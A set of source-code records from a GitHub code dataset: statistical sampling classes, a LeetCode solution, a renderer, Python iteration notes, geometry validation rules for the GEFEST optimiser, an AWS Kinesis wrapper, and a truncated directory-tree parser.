mu_dot_prec_obs = omega * mu_obs\n\n # Update the sufficient statistics for each neuron\n for k in range(self.K-1):\n lkhd_precision[k,:,:] += (z * prec_obs[:,k][:,None]).T.dot(z)\n lkhd_mean_dot_precision[k,:] += \\\n (mu_dot_prec_obs[:,k]).T.dot(z)\n\n # Sample each row of C\n for k in range(self.K-1):\n post_prec = prior_precision + lkhd_precision[k,:,:]\n post_cov = np.linalg.inv(post_prec)\n post_mu = (prior_mean_dot_precision +\n lkhd_mean_dot_precision[k,:]).dot(post_cov)\n post_mu = post_mu.ravel()\n\n self.C[k,:] = np.random.multivariate_normal(post_mu, post_cov)\n\n def resample_omega(self, augmented_data_list):\n \"\"\"\n Resample omega from its conditional Polya-gamma distribution\n :return:\n \"\"\"\n K = self.K\n for data in augmented_data_list:\n x = data[\"x\"]\n T = data[\"T\"]\n\n # TODO: Fix this hack\n if \"z\" in data:\n z = data[\"z\"]\n elif \"states\" in data:\n z = data[\"states\"].stateseq\n else:\n raise Exception(\"Could not find latent states in augmented data!\")\n\n psi = z.dot(self.C.T) + self.mu[None, :]\n N = N_vec(x).astype(np.float)\n tmp_omg = np.zeros(N.size)\n ppg.pgdrawvpar(self.ppgs, N.ravel(), psi.ravel(), tmp_omg)\n data[\"omega\"] = tmp_omg.reshape((T, self.K-1))\n\n # Clip out zeros\n data[\"omega\"] = np.clip(data[\"omega\"], 1e-8,np.inf)\n\n def conditional_mean(self, augmented_data):\n \"\"\"\n Compute the conditional mean \\psi given \\omega\n :param augmented_data:\n :return:\n \"\"\"\n cm = augmented_data[\"kappa\"] / augmented_data[\"omega\"]\n cm[~np.isfinite(cm)] = 0\n cm -= self.mu[None,:]\n return cm\n\n def conditional_prec(self, augmented_data, flat=False):\n \"\"\"\n Compute the conditional mean \\psi given \\omega\n :param augmented_data:\n :return:\n \"\"\"\n O = augmented_data[\"omega\"]\n T = augmented_data[\"T\"]\n Km1 = self.K-1\n\n if flat:\n prec = O\n else:\n prec = np.zeros((T, Km1, Km1))\n for t in range(T):\n prec[t,:,:] = np.diag(O[t,:])\n\n return prec\n\n def conditional_cov(self, augmented_data, flat=False):\n # Since the precision is diagonal, we can invert elementwise\n O = augmented_data[\"omega\"]\n T = augmented_data[\"T\"]\n Km1 = self.K-1\n\n if flat:\n cov = 1./O\n else:\n cov = np.zeros((T, Km1, Km1))\n for t in range(T):\n cov[t,:,:] = np.diag(1./O[t,:])\n\n return cov\n\n### Logistic Normal Models\n# For comparison, we implement the logistic normal model, which is\n# also amenable to PG augmentation, but only the conditional marginals\n# are rendered conjugate with a Gaussian prior, not the conditional joint\n# distribution over \\psi_{1:K}.\n\nclass PGLogisticNormalMultinomial(GibbsSampling):\n def __init__(self, K, pi=None, psi=None, mu=None, Sigma=None):\n \"\"\"\n Create a PGMultinomial distribution with mean and covariance for psi.\n\n :param K: Dimensionality of the multinomial distribution\n :param pi: Multinomial probability vector (must sum to 1)\n :param psi: Transformed multinomial probability vector\n :param mu: Mean of \\psi\n :param Sigma: Covariance of \\psi\n \"\"\"\n assert isinstance(K, int) and K >= 2, \"K must be an integer >= 2\"\n self.K = K\n\n assert pi is not None or psi is not None or None not in (mu, Sigma), \\\n \"pi, psi, or (mu and Sigma) must be specified\"\n\n if pi is not None:\n assert isinstance(pi, np.ndarray) and \\\n pi.shape == (K,) and \\\n np.allclose(pi.sum(), 1.0), \\\n \"Pi must be a normalized length-K vector\"\n self.pi = pi\n\n if psi is not None:\n assert isinstance(psi, np.ndarray) and \\\n psi.shape == (K-1,), \\\n \"Psi must be a length-K vector of reals\"\n self.psi = psi\n\n if None not in (mu, Sigma):\n assert isinstance(mu, np.ndarray) and mu.shape == (K,), \\\n \"Mu must be a length-K vector\"\n\n assert isinstance(Sigma, np.ndarray) and Sigma.shape == (K,K), \\\n \"Sigma must be a KxK Covariance matrix\"\n self.mu = mu\n self.Sigma = Sigma\n self.Lambda = np.linalg.inv(Sigma)\n\n # If psi and pi have not been given, sample from the prior\n if psi is None and pi is None:\n self.psi = np.random.multivariate_normal(self.mu, self.Sigma)\n\n # Initialize Polya-gamma augmentation variables\n self.ppgs = initialize_polya_gamma_samplers()\n self.omega = np.ones(self.K)\n\n # Initialize the space for the transformed psi variables, rho\n self.rho = np.zeros(self.K)\n\n @property\n def pi(self):\n return ln_psi_to_pi(self.psi)\n\n @pi.setter\n def pi(self, value):\n self.psi = ln_pi_to_psi(value)\n\n def log_likelihood(self, x):\n ll = 0\n ll += gammaln((x+1).sum()) - gammaln(x+1).sum()\n ll += (x * np.log(self.pi)).sum()\n return ll\n\n def rvs(self, size=1, N=1):\n \"\"\"\n Sample from a PG augmented multinomial distribution\n :param size:\n :return:\n \"\"\"\n # Sample from the multinomial distribution\n return np.random.multinomial(N, self.pi, size=size)\n\n def resample(self, x=None):\n if x is None:\n x = np.zeros((0,self.K))\n\n self.resample_omega(x)\n self.resample_psi(x)\n\n def conditional_psi(self, x, k):\n \"\"\"\n Compute the conditional distribution over psi given observation x and omega\n Using the notation from\n :param x:\n :return:\n \"\"\"\n if x.ndim == 1:\n xx = x[None,:]\n else:\n xx = x\n\n Ck = xx[:,k].sum()\n N = xx.sum()\n\n notk = np.ones(self.K, dtype=np.bool)\n notk[k] = False\n\n # Compute zeta = log(\\sum_{j \\neq k} e^{\\psi_j})\n zetak = logsumexp(self.psi[notk])\n\n # Compute rho\n self.rho[k] = self.psi[k] - zetak\n\n # Get the marginal distribution over rho under the prior\n muk_marg = self.mu[k] \\\n - 1./self.Lambda[k,k] * self.Lambda[k,notk].\\\n dot(self.psi[notk] - self.mu[notk])\n sigmak_marg = 1./self.Lambda[k,k]\n\n # Compute the conditional posterior given psi[notk] and omega\n omegak = self.omega[k]\n sigmak_cond = 1./(omegak + 1./sigmak_marg)\n\n # kappa is the mean dot precision, i.e. the sufficient statistic of a Gaussian\n # therefore we can sum over datapoints\n kappa = (Ck - N/2.0).sum()\n muk_cond = sigmak_cond * (kappa + muk_marg / sigmak_marg + omegak*zetak)\n\n return muk_cond, sigmak_cond\n\n def resample_psi(self, x):\n for k in range(self.K):\n mu_cond, sigma_cond = self.conditional_psi(x, k)\n self.psi[k] = np.random.normal(mu_cond, np.sqrt(sigma_cond))\n\n def resample_omega(self, x):\n \"\"\"\n Resample omega from its conditional Polya-gamma distribution\n :return:\n \"\"\"\n assert x.ndim == 2\n N = x.sum()\n\n # Sum the N's (i.e. the b's in the denominator)\n ppg.pgdrawvpar(self.ppgs, N * np.ones(self.K), self.rho, self.omega)\n\n\n\n\n### Competing models\nclass IndependentMultinomialsModel(Model):\n \"\"\"\n Naive model where we assume the data is drawn from a\n set of static multinomial distributions. For example,\n we observe a matrix of NxK counts and assume that each\n row is a sample from a multinomial distribution with\n parameter \\pi_n. To estimate \\pi_n, we use the empirical\n probability under the training data.\n \"\"\"\n def __init__(self, X):\n assert X.ndim == 2 and (X >= 0).all()\n\n self.N, self.K = X.shape\n # Compute the empirical name probabilities for each row\n alpha = 1\n self.pi = (X+alpha).astype(np.float) / (X+alpha).sum(axis=1)[:,None]\n\n self.multinomials = []\n for pi_n in self.pi:\n self.multinomials.append(Multinomial(weights=pi_n, K=self.K))\n\n def add_data(self,data):\n raise NotImplementedError\n\n def generate(self,keep=True,**kwargs):\n raise NotImplementedError\n\n def predictive_log_likelihood(self, X_test):\n assert X_test.shape == (self.N, self.K)\n ll = 0\n ll += gammaln(X_test.sum(axis=1)+1).sum() - gammaln(X_test+1).sum()\n ll += np.nansum(X_test * np.log(self.pi))\n return ll\n","repo_name":"HIPS/pgmult","sub_path":"pgmult/distributions.py","file_name":"distributions.py","file_ext":"py","file_size_in_byte":18659,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"53"} +{"seq_id":"29891179058","text":"class Solution:\n def combinationSum(self, candidates, target: int):\n # def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates.sort()\n len_cand = len(candidates)\n out_list = []\n stack_for_indices = []\n cur_stack = []\n cur_sum = 0\n i = 0\n while i < len_cand or len(cur_stack) > 0:\n if i < len_cand:\n if cur_sum + candidates[i] <= target:\n stack_for_indices.append(i)\n cur_stack.append(candidates[i])\n cur_sum += cur_stack[-1]\n if cur_sum == target:\n # We found a match!\n out_list.append(cur_stack.copy())\n # clean up structures after a match\n cur_top = cur_stack.pop()\n stack_for_indices.pop()\n cur_sum -= cur_top\n i += 1\n else: # cur_sum + candidates[i] > target:\n if len(cur_stack) >0:\n cur_top = cur_stack.pop()\n i = stack_for_indices.pop() + 1\n cur_sum -= cur_top\n else:\n break\n else:\n i = stack_for_indices.pop() + 1\n cur_top = cur_stack.pop()\n cur_sum -= cur_top\n return out_list\n\ncandidates = [1]\ntarget = 2\noutput = Solution().combinationSum(candidates,target)\nprint(output)\n \n\n\n","repo_name":"Arnon120/leetcode","sub_path":"39. Combination Sum.py","file_name":"39. Combination Sum.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28224516974","text":"import numpy as np\n\nfrom ray import Ray2D\nfrom renderer import Renderer, RenderingResult\n\n\nclass HybridRenderingResult(RenderingResult):\n def __init__(self, colors, maxSamplePoints, ratios):\n super(HybridRenderingResult, self).__init__(colors, maxSamplePoints)\n self.ratios = ratios\n\n\nclass HybridRenderer(Renderer):\n def __init__(self, eye, screen):\n super(HybridRenderer, self).__init__(eye, screen)\n\n def render(self, model, delta, plotter=None):\n numPixels = self.screen.numPixels\n pixels = self.screen.pixels\n pixelWidth = self.screen.pixelWidth\n\n colors = np.zeros((numPixels, 4))\n maxSamplePoints = 0\n\n ratios = np.zeros(numPixels)\n\n for i, pixel, in enumerate(pixels):\n viewRay = Ray2D(self.eye, pixel, 10, pixelWidth)\n\n if plotter is not None and self.plotViewRays:\n plotter.plotViewRay(viewRay, [0, 10])\n\n result = model.raycast(viewRay, delta, plotter)\n\n if result.color is not None:\n colors[i] = result.color\n maxSamplePoints = max(result.samples, maxSamplePoints)\n ratios[i] = model.voxelRatio()\n\n return HybridRenderingResult(colors, maxSamplePoints, ratios)\n","repo_name":"sveinungf/IsoGeo2D","sub_path":"hybridrenderer.py","file_name":"hybridrenderer.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70866347689","text":"# multi input comprehension\n\nl = [i * 2 for i in range(10)]\n\n# we can use many inputs and if clauses\n\n# later fors are nested in earlier ones\ncoords = [(x, y) for x in range(5) for y in range(3)]\n\nvalues = [x / (x-y)\n for x in range(50)\n if x > 50\n for y in range(100)\n if x-y != 0]\n\n# we can go meta\n\nvals = [[y * 3 for y in range(x)] for x in range(10)]\n\n# set/dict/generator work all the same\n\n\n# and now, map (c# select)\n\nunicodepoints = map(ord, 'árvíztűrő tükorfúrógép')\n\n# map() is lazy, only does things on iteration\n\n# map takes any args, function first and any other following ones are func args\n\ndef add(a, b):\n return a + b\n\nl1 = [1, 2, 3]\nl2 = [4, 5, 6]\n\nsums = list(map(add, l1, l2)) # [5, 7, 9]\n\n# map will terminate as soon as any input terminates\n\n\n\n# and now, filter (c# where)\n\n# filter(func, list)\n# we can use lambdas yay\n\npositives = filter(lambda x: x > 0, [-1, -2, 0, 2, 3]) # 2, 3\n\n\n\n# and now, functools.reduce() (c# aggregate)\n\n# repeatedly apply function until single result remains\n\nfrom functools import reduce\nimport operator\n\ntotal = reduce(operator.add, [1, 2, 3, 4, 5])\n\n# empty input results in fail, can pass a 3rd argument as default initial\n\n\n# and now, our own iterables\n\n# first iter() is called to create, then next() for items, next will raise StopIteration when it runs out\n\n# iterable is anything that implements dunder iter\n\n# alternatively, dunder getitem for consecutive integer indexing\n\n# iter(callable, sentinel), this stops when callable yields the same as sentinel","repo_name":"tomzorz/kigyo","sub_path":"src/beyond_8_iteration.py","file_name":"beyond_8_iteration.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12055222869","text":"import copy\nfrom enum import Enum\nfrom itertools import combinations\n\nimport numpy as np\nfrom shapely.geometry import GeometryCollection, LineString, MultiPoint\nfrom shapely.geometry import Point as ShapelyPoint\nfrom shapely.geometry import Polygon as ShapelyPolygon\nfrom shapely.ops import unary_union\nfrom shapely.validation import explain_validity\n\nfrom gefest.core.geometry import Point, Polygon, Structure\nfrom gefest.core.geometry.domain import Domain\nfrom gefest.core.opt.postproc.rules_base import PolygonRule, StructureRule\n\n\nclass PolygonsNotTooClose(StructureRule):\n \"\"\"Validated distance between polygons.\"\"\"\n\n @staticmethod\n def validate(struct: Structure, domain: Domain) -> bool:\n \"\"\"Checks distances between polgons.\"\"\"\n pairs = tuple(combinations(struct.polygons, 2))\n is_too_close = [False] * len(pairs)\n\n for idx, pair in enumerate(pairs):\n is_too_close[idx] = (\n _pairwise_dist(pair[0], pair[1], domain) < domain.dist_between_polygons\n )\n\n return not any(is_too_close)\n\n @staticmethod\n def correct(struct: Structure, domain: Domain) -> Structure:\n \"\"\"Removes one of polygons that are closer than the specified threshold.\"\"\"\n polygons = struct.polygons\n num_poly = len(polygons)\n to_delete = []\n\n for i in range(num_poly - 1):\n for j in range(i + 1, num_poly):\n distance = _pairwise_dist(polygons[i], polygons[j], domain)\n if distance < domain.dist_between_polygons:\n if (\n polygons[i] not in domain.fixed_points\n or polygons[i] not in domain.prohibited_area\n ):\n to_delete.append(i) # Collecting polygon indices for deletion\n\n to_delete_poly = [struct.polygons[i] for i in np.unique(to_delete)]\n corrected_structure = Structure(\n polygons=[poly for poly in struct.polygons if poly not in to_delete_poly],\n )\n\n return corrected_structure\n\n\ndef _pairwise_dist(poly_1: Polygon, poly_2: Polygon, domain: Domain):\n\n # return 0 gives infinite computation\n if poly_1 is poly_2 or len(poly_1.points) == 0 or len(poly_2.points) == 0:\n return 9999\n\n # nearest_pts = domain.geometry.nearest_points(poly_1, poly_2) ??? why returns only 1 point\n return domain.geometry.min_distance(poly_1, poly_2)\n\n\nclass PointsNotTooClose(PolygonRule):\n \"\"\"Validated length of polygon edges.\"\"\"\n\n @staticmethod\n def validate(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> bool:\n \"\"\"Checks if each :obj:`Point` in :obj:`Polygon` are placed in valid distance by previous.\n\n Args:\n structure: the :obj:`Structure` that explore\n\n Returns:\n ``True`` if any side of poly have incorrect lenght, otherwise - ``False``\n\n \"\"\"\n poly = copy.deepcopy(structure[idx_poly_with_error])\n if poly[0] != poly[-1] and domain.geometry.is_closed:\n poly.points = poly.points.append(poly[0])\n\n lenght = domain.dist_between_points\n check, norms = [[None] * (len(poly) - 1)] * 2\n for idx, pair in enumerate(\n zip(\n poly[:-1],\n poly[1:],\n ),\n ):\n norm = np.linalg.norm(np.array(pair[1].coords) - np.array(pair[0].coords))\n norms[idx] = norm\n check[idx] = norm > lenght\n\n return all(check)\n\n @staticmethod\n def correct(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> Polygon:\n \"\"\"Corrects polygon.\"\"\"\n poly = copy.deepcopy(structure[idx_poly_with_error])\n poly = domain.geometry.simplify(poly, domain.dist_between_points * 1.05)\n\n if poly[0] != poly[-1] and domain.geometry.is_closed:\n poly.points.append(poly[0])\n\n elif poly[0] == poly[-1] and not domain.geometry.is_closed:\n poly.points = poly.points[:-1]\n\n return poly\n\n\nclass PolygonNotOverlapsProhibited(PolygonRule):\n \"\"\"Validates polygon overlapping other objects.\"\"\"\n\n @staticmethod\n def validate(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> bool:\n \"\"\"Checks if polygon overlaps other polygons or prohibits.\"\"\"\n geom = domain.geometry\n if domain.geometry.is_closed:\n pass\n else:\n\n prohib = geom.get_prohibited_geom(domain.prohibited_area, domain.dist_between_polygons)\n prohib = unary_union(prohib)\n poly = geom._poly_to_shapely_line(structure[idx_poly_with_error])\n\n if poly.intersects(prohib):\n return False\n\n return True\n\n @staticmethod\n def correct(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> Polygon:\n \"\"\"Corrects polygon overlaps.\"\"\"\n geom = domain.geometry\n if domain.geometry.is_closed:\n raise NotImplementedError()\n else:\n\n prohib = geom.get_prohibited_geom(domain.prohibited_area, domain.dist_between_polygons)\n prohib = unary_union(prohib)\n\n poly = geom._poly_to_shapely_line(structure[idx_poly_with_error])\n\n if poly.intersects(prohib):\n res = poly.difference(prohib.buffer(0.001))\n\n if isinstance(res, (MultiPoint, LineString)):\n res = GeometryCollection(res)\n\n parts = res.geoms\n parts = [g for g in parts if not g.intersects(prohib)]\n poly = np.random.choice(parts)\n return Polygon([Point(p[0], p[1]) for p in poly.coords])\n else:\n return Polygon([Point(p[0], p[1]) for p in poly.coords])\n\n\nclass PolygonGeometryIsValid(PolygonRule):\n \"\"\"Validates polygon geometry.\n\n A polygon is invalid if its geometry does not match the geometry of the domain.\n\n \"\"\"\n\n @staticmethod\n def validate(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> bool:\n \"\"\"Validates polygon geometry.\"\"\"\n poly = structure[idx_poly_with_error]\n if (domain.geometry.is_closed and (poly[0] == poly[-1])) or (\n not domain.geometry.is_closed and (poly[0] != poly[-1])\n ):\n return True\n\n return False\n\n @staticmethod\n def correct(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> Polygon:\n \"\"\"Corrects polygon geometry.\"\"\"\n poly = structure[idx_poly_with_error]\n if domain.geometry.is_closed and (poly[0] != poly[-1]):\n poly.points.append(poly.points[0])\n\n elif not domain.geometry.is_closed and (poly[0] == poly[-1]):\n poly.points = poly.points[:-1]\n\n return poly\n\n\nclass PolygonNotOutOfBounds(PolygonRule):\n \"\"\"Out of bounds rule. Polygon invalid if it out of bounds.\"\"\"\n\n @staticmethod\n def validate(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> bool:\n \"\"\"Checks if polygon is out of domain bounds.\"\"\"\n geom_poly_allowed = ShapelyPolygon(\n [ShapelyPoint(pt.x, pt.y) for pt in domain.allowed_area],\n )\n for pt in structure[idx_poly_with_error]:\n geom_pt = ShapelyPoint(pt.x, pt.y)\n if (\n not geom_poly_allowed.contains(geom_pt)\n and not geom_poly_allowed.distance(geom_pt) < domain.min_dist_from_boundary\n ):\n return False\n\n return True\n\n @staticmethod\n def correct(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> Polygon:\n \"\"\"Corrects out of bound polygon.\"\"\"\n point_moved = False\n poly = structure[idx_poly_with_error]\n for p_id, point in enumerate(poly):\n if point in domain.fixed_points:\n continue\n\n point.x = max(point.x, domain.min_x + domain.len_x * 0.05)\n point.y = max(point.y, domain.min_y + domain.len_y * 0.05)\n point.x = min(point.x, domain.max_x + domain.len_x * 0.05)\n point.y = min(point.y, domain.max_y + domain.len_y * 0.05)\n if point not in domain:\n new_point = domain.geometry.nearest_point(point, domain.bound_poly)\n poly.points[p_id] = new_point\n point_moved = True\n\n if point_moved:\n poly = domain.geometry.resize_poly(poly=poly, x_scale=0.8, y_scale=0.8)\n\n if poly[0] != poly[-1] and domain.geometry.is_closed:\n poly.points.append(poly[0])\n elif poly[0] == poly[-1] and not domain.geometry.is_closed:\n poly.points = poly.points[:-1]\n\n return poly\n\n\nclass PolygonNotSelfIntersects(PolygonRule):\n \"\"\"Selfintersection rule. Polygon invalid if it have selfintersections.\"\"\"\n\n @staticmethod\n def validate(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> bool:\n \"\"\"Validates polygon for selfintersection.\"\"\"\n poly = structure[idx_poly_with_error]\n return not (\n len(poly) > 2\n and _forbidden_validity(\n explain_validity(\n ShapelyPolygon([ShapelyPoint(pt.x, pt.y) for pt in poly]),\n ),\n )\n )\n\n @staticmethod\n def correct(\n structure: Structure,\n idx_poly_with_error: int,\n domain: Domain,\n ) -> Polygon:\n \"\"\"Corrects selfintersection in polygon.\"\"\"\n poly = structure[idx_poly_with_error]\n poly = domain.geometry.get_convex(poly)\n if not domain.geometry.is_closed:\n poly.points = poly.points[:-1]\n\n return poly\n\n\ndef _forbidden_validity(validity):\n if 'Valid Geometry' in validity:\n return False\n else:\n return True\n\n\nclass Rules(Enum):\n \"\"\"Enumeration of all defined rules.\"\"\"\n\n not_too_close_polygons = PolygonsNotTooClose()\n valid_polygon_geom = PolygonGeometryIsValid()\n not_out_of_bounds = PolygonNotOutOfBounds()\n not_self_intersects = PolygonNotSelfIntersects()\n not_overlaps_prohibited = PolygonNotOverlapsProhibited()\n not_too_close_points = PointsNotTooClose()\n","repo_name":"aimclub/GEFEST","sub_path":"gefest/core/opt/postproc/rules.py","file_name":"rules.py","file_ext":"py","file_size_in_byte":10412,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"2020207462","text":"import os\nimport sys\nimport time\nimport boto3\nimport logging\nfrom botocore.exceptions import ClientError\n\nclass kinesis_handler():\n \n def __init__(self, region_name=None):\n \n self.kinesis_client = boto3.client('kinesis')\n \n print (f\"This is a Kinesis handler.\")\n \n def create_streams(self, data_streams):\n \n try:\n \n for stream in data_streams:\n \n if stream[\"stream_mode\"] == \"PROVISIONED\":\n self.kinesis_client.create_stream(\n StreamName=stream[\"name\"],\n ShardCount= stream[\"shard_count\"],\n StreamModeDetails={\n 'StreamMode': stream[\"stream_mode\"] #'PROVISIONED'|'ON_DEMAND'\n }\n ) \n else:\n self.kinesis_client.create_stream(\n StreamName=stream[\"name\"],\n StreamModeDetails={\n 'StreamMode': stream[\"stream_mode\"] #'PROVISIONED'|'ON_DEMAND'\n }\n )\n \n except ClientError as e:\n \n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n\n # Wait until all streams are created\n create_stream_result = {}\n waiter = self.kinesis_client.get_waiter('stream_exists')\n for stream in data_streams:\n waiter.wait(StreamName= stream[\"name\"])\n response = self.kinesis_client.describe_stream(StreamName=stream[\"name\"])\n create_stream_result[stream[\"name\"]] = response[\"StreamDescription\"][\"StreamARN\"]\n \n return create_stream_result\n \n def describe_stream(self, stream_name):\n \n try:\n desc_stream = self.kinesis_client.describe_stream(\n StreamName=stream_name\n )\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n return desc_stream\n \n def increase_stream_retention_period(self, stream_name, retention_period, stream_arn):\n \n try:\n response = self.kinesis_client.increase_stream_retention_period(\n StreamName=stream_name,\n RetentionPeriodHours=int(retention_period),\n StreamARN=stream_arn\n )\n \n except ClientError as e:\n \n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n print (f'Stream Retention Period was increased to {retention_period} hours.')\n return True\n \n def decrease_stream_retention_period(self, stream_name, retention_period, stream_arn):\n \n try:\n response = self.kinesis_client.decrease_stream_retention_period(\n StreamName=stream_name,\n RetentionPeriodHours=int(retention_period),\n StreamARN=stream_arn\n )\n\n except ClientError as e:\n \n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n print (f'Stream Retention Period was decreased to {retention_period} hours.')\n return True\n \n def delete_stream(self, stream_name, consumer_deletion, stream_arn):\n \n try:\n response = self.kinesis_client.delete_stream(\n StreamName=stream_name,\n EnforceConsumerDeletion=consumer_deletion,\n StreamARN=stream_arn\n )\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n print (f'Stream \"{stream_name}\" was deleted successfully!.')\n return True\n \n def put_record(self, stream_name, data, partition_key):\n \n try:\n self.kinesis_client.put_record(\n StreamName=stream_name,\n Data=data,\n PartitionKey=partition_key\n )\n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n def get_shard_iterator(self, stream_name):\n \n output_stream_info = self.describe_stream(\n stream_name=stream_name\n )\n shard_id = output_stream_info[\"StreamDescription\"][\"Shards\"][0][\"ShardId\"]\n \n try:\n shard_response = self.kinesis_client.get_shard_iterator(\n StreamName=stream_name,\n ShardId=shard_id,\n ShardIteratorType=\"LATEST\"\n )\n shardIterator = shard_response[\"ShardIterator\"]\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n return shardIterator\n \n def get_records(self, shard_iterator):\n \n try:\n response = self.kinesis_client.get_records(\n ShardIterator=shard_iterator,\n Limit=10000, # default: 10,000\n )\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n return response\n \n\n\nclass kinesis_analytics_handler():\n \n def __init__(self, region_name=None):\n \n self.kinesis_analytics = boto3.client('kinesisanalytics')\n \n print (f\"This is a Kinesis Analytics handler.\")\n \n def create_application(self, application_name, application_code, inputs, outputs):\n \n try:\n response = self.kinesis_analytics.create_application(\n ApplicationName=application_name,\n ApplicationCode=application_code,\n Inputs=inputs,\n Outputs=outputs,\n )\n \n except ClientError as e:\n \n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n print (f'kinesis application \"{application_name}\" was created successfully!.')\n return True\n \n def describe_application(self, application_name):\n \n try:\n response = self.kinesis_analytics.describe_application(\n ApplicationName=application_name\n )\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n return response\n \n def start_application(self, application_name):\n \n application=self.describe_application(\n application_name=application_name\n )\n input_id = application[\"ApplicationDetail\"][\"InputDescriptions\"][0][\"InputId\"]\n \n try:\n self.kinesis_analytics.start_application(\n ApplicationName=application_name,\n InputConfigurations=[\n {\n \"Id\": input_id,\n \"InputStartingPositionConfiguration\": {\n \"InputStartingPosition\": \"NOW\"\n }\n }\n ]\n )\n \n # Wait until application starts running\n application=self.describe_application(\n application_name=application_name\n )\n status = application[\"ApplicationDetail\"][\"ApplicationStatus\"]\n print (f\"current status: {status}\")\n \n sys.stdout.write('Starting ')\n while status != \"RUNNING\":\n sys.stdout.write('.')\n sys.stdout.flush()\n time.sleep(1)\n application=self.describe_application(\n application_name=application_name\n )\n status = application[\"ApplicationDetail\"][\"ApplicationStatus\"]\n sys.stdout.write('RUNNING')\n sys.stdout.write(os.linesep)\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n return False\n \n print (f'kinesis application \"{application_name}\" start!!')\n return True\n \n def stop_application(self, application_name):\n \n try:\n self.kinesis_analytics.stop_application(\n ApplicationName=application_name\n )\n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n # Wait until application stops running\n response = self.describe_application(\n application_name=application_name\n )\n status = response[\"ApplicationDetail\"][\"ApplicationStatus\"]\n sys.stdout.write('Stopping ')\n\n while status != \"READY\":\n sys.stdout.write('.')\n sys.stdout.flush()\n time.sleep(1)\n response = self.describe_application(\n application_name=application_name\n )\n status = response[\"ApplicationDetail\"][\"ApplicationStatus\"]\n\n sys.stdout.write(os.linesep)\n \n print (f'STOP: kinesis application \"{application_name}\"')\n \n def delete_application(self, application_name):\n \n response = self.describe_application(\n application_name=application_name\n )\n \n try:\n self.kinesis_analytics.delete_application(\n ApplicationName=application_name,\n CreateTimestamp=response['ApplicationDetail']['CreateTimestamp']\n )\n \n except ClientError as e:\n logging.error(e)\n \n if e.response['Error']['Code'] == 'ResourceInUseException':\n print(e.response['message'])\n else:\n print(e.response['Error']['Code'])\n \n print (f'kinesis application \"{application_name}\" was deleted successfully!.')\n\n \n","repo_name":"dongjin-ml/anomaly-detection-with-explanation","sub_path":"utils/kinesis.py","file_name":"kinesis.py","file_ext":"py","file_size_in_byte":12121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"525761779","text":"from anytree import Node, NodeMixin,RenderTree, search\n\n\nclass Element (NodeMixin):\n def __init__(self, name, dir=False,size=0, parent=None, children=None):\n self.size = size\n self.name = name\n self.parent=parent\n self.dir = dir\n if children:\n self.children = children\n def calculate_size(self):\n if(self.size == 0):\n return sum([e.calculate_size() for e in self.children])\n else:\n return self.size\n\ndef printTree(tree):\n for pre, fill, node in RenderTree(root):\n print(\"%s%s %s\" % (pre, node.name, node.size))\n\nnodes = []\n\nroot = Element(\"root\")\ncurrentNode = root\nnodes.append(root)\nwith open(\"input.txt\") as f:\n lines = [x.strip() for x in f.readlines()]\n for l in lines:\n #print(\"line: %s\" % l)\n if(l == '$ cd /'):\n #print(\"cd to root\")\n currentNode = root\n #print(currentNode)\n elif(l == '$ cd ..'):\n print(\"CURRENTDIR: %s\" % currentNode.name)\n currentNode = currentNode.parent\n elif(list(l)[0] != '$'):\n #print(\"ls dir: %s\" % l)\n s, n = l.split(' ')\n if(s == 